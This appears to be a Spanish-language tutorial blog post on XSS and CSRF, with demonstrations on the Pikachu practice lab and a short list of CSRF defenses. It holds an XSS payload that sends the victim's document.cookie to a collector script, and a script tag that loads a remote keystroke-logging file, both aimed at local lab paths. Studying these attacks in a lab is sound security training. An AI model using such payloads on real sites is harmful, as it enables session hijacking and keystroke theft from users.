Vulnerabilidades XSS y CSRF

Introducción a las vulnerabilidades XSS

XSS (Cross-Site-Scripting), es decir, un ataque de secuencias de comandos entre sitios, significa que el atacante utiliza las lagunas del código en el servidor web para incrustar secuencias de comandos del lado del cliente (generalmente un código malicioso escrito en JavaScript) en la página. Cuando un usuario del servidor accede a una página que contiene un código script malicioso en un sitio web, el navegador del usuario cargará y ejecutará automáticamente el código malicioso, logrando así el objetivo del ataque.

Clasificación XSS

  • XSS reflejado
  • XSS almacenado
  • XSS tipo DOM

Cómo utilizar la vulnerabilidad XSS para realizar el ataque

Usar XSS para robar la cookie del usuario

Puede usar la gestión de fondo XSS de pikachu, ingresar el código en el get reflexivo y puede ver la información en la gestión de fondo XSS. La ruta aquí debe basarse en su propia ruta de archivo.

<script> document.location = 'http://localhost/pikachu-master/pkxss/xcookie/cookie.php?cookie='+document.cookie; </script>

Lógicamente, el tipo de almacenamiento XSS también es posible, pero recuerda, si usas la prueba de tipo de almacenamiento XSS, cada vez que ingreses a la interfaz de almacenamiento XSS, saltarás a index.php, si quieres resolverlo, debes vaya a la base de datos y elimine el script insertado. Los datos están en pikachu.message.

Phishing con XSS

El mecanismo de autenticación HTTP de PHP solo funciona cuando PHP se ejecuta como un módulo de Apache, por lo que esta función no está disponible para la versión CGI. Dado que estoy usando el panel de cuero pequeño, el valor predeterminado es usar CGI/FastCGI, y la pesca con el campo de tiro de pikachu no ha tenido éxito.

Supervisión del teclado mediante XSS

<script  src=" http://localhost/pikachu-master/pkxss/rkeypress/rk.js"></script>

Introducción a las vulnerabilidades CSRF

CSRF (Cross-Site Request Forgery), es decir, ataque de falsificación de solicitud entre sitios. El atacante puede robar su información de inicio de sesión y simular el envío de varias solicitudes en su identidad. Esta solicitud es completamente legal para el servidor, pero completa una operación esperada por el atacante, como enviar correos electrónicos en su nombre, enviar mensajes, robar su cuenta, agregue administradores del sistema, incluso compre bienes, transfiera moneda virtual, etc.

Condiciones de ataque de vulnerabilidad CSRF

  1. Inicie sesión en el sitio web de confianza A y genere una cookie localmente
  2. Visite el sitio web peligroso B sin cerrar sesión en el sitio web A

Defensa CSRF

  • Valide el campo de referencia HTTP
  • Agregar token y verificar
  • Atributos personalizados en encabezados HTTP y validación

Supongo que te gusta

Origin blog.csdn.net/Hacker0830/article/details/129975243
Recomendado
Clasificación